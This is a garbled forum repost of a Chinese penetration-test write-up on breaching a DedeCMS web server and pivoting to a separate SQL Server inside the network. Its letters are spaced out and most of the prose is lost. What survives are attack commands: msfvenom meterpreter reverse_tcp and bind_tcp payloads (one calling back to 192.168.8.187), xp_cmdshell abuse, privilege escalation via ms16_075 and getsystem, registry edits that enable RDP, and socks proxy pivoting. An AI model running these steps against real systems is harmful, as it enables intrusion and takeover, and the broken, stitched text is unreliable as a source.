[18544] 2021-04-11_实战记一次站库分离的内网渗透

文档创建者:s7ckTeam
浏览次数:2
最后更新:2025-01-18
2021-04-11_实战记一次站库分离的内网渗透   |     R a i l g u n   H A C K   2 0 2 1 - 0 4 - 1 1 D M Z   W e b I n f o r m a t i o n   G a t h e r i n g W E B I I S   7 便 西 a s p x : 2 1 9 9 9 w e b
p h p m y a d m i n   m y s q l r o o t a d m i n t e s t e n u m e r a t i o n : f t p m s s q l m y s q l :
w w w . t a r g e t . c o m   n e w . t a r g e t . c o m  
w w 2 . t a r g e t . c o m   G r c m s D e d e c m s   G e t s h e l l d e d e c m s D e d e C M S V 5 7 _ U T F 8 _ S P 1 ( 2 0 1 5 0 6 1 8     k a l i ) a d m i n :
g e t s h e l l - > D M Z   P r i v i l e g e   E s c a l a t i o o n w e b s h e l l m s f   m e t e r p r e t e r   s h e l l 怀 d i s a b l e _ f u n c t i o n s : m s f v e n o m   - p   w i n d o w s / m e t e r p r e t e r / r e v e r s e _ t c p   l h o s t = 1 9 2 . 1 6 8 . 8 . 1 8 7   l p o r t = 2 6 7 8   - f   e x e   >   . / b d . e x e
A n t S w o r d 便 a s p x : D : c : w i n d o w s d e b u g W I A g e t s y s t e m s u g g e s t e r :
m s 1 6 _ 0 7 5 : S Q L   S e r v e r P r i v i l e g e   E s c a l a t i o n 3 3 8 9 :
. n e t s q l   s e r v e r w w 2 . t a r g e t . c o m s a a s p x : x p _ c m d s h e l l :
1 3 6 s q l   s e v e r   i p x p _ c m d s h e l l 3 3 8 9 : S o c k s   P r o x i f i e r e w p r o x c h a i n s m s f D M Z e w m s f 使 使 a u x i l i a r y / s e r v e r / s o c k s 4 a m s f s o c k s m s f 访 访 p r o x y c h a i n s i p m s f : r e g   a d d   " H K E Y _ L O C A L _ M A C H I N E S Y S T E M C u r r e n t C o n t r o l S e t C o n t r o l T e r m i n a l   S e r v e r "   / v   f D e n y T S C o n n e c t i o n s   / t   R E G _ D W O R D   / d   0   / f r e g   a d d   " H K E Y _ L O C A L _ M A C H I N E S Y S T E M C u r r e n t C o n t r o l S e t C o n t r o l T e r m i n a l   S e r v e r W d s r d p w d T d s t c p "   / v   P o r t N u m b e r   / t   R E G _ D W O R D   / d   3 3 8 9   / f r e g   a d d   " H K E Y _ L O C A L _ M A C H I N E S Y S T E M C u r r e n t C o n t r o l S e t C o n t r o l T e r m i n a l   S e r v e r W i n S t a t i o n s R D P - T c p "   / v   P o r t N u m b e r   / t   R E G _ D W O R D   / d   3 3 8 9   / f n e t   s t a r t   t e r m s e r v i c e
m s f v e n o m b i n d _ t c p W i n d o w s p r o x i f i e r ( S o c k s C a p 6 4 ) D M Z 8 8 8 8 S Q L   S e r v e r 3 3 8 9 : m s f S Q L   S e r v e r s h e l l : s h e l l 1 0 . 1 0 . 1 . 0 / 2 4 I n t r a n e t   W e b I n f o r m a t i o n   G a t h e r i n g m s f v e n o m   - p   w i n d o w s / m e t e r p r e t e r / b i n d _ t c p   l p o r t = 2 9 9 9   - f   e x e   >   . / b d _ 1 . e x e
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则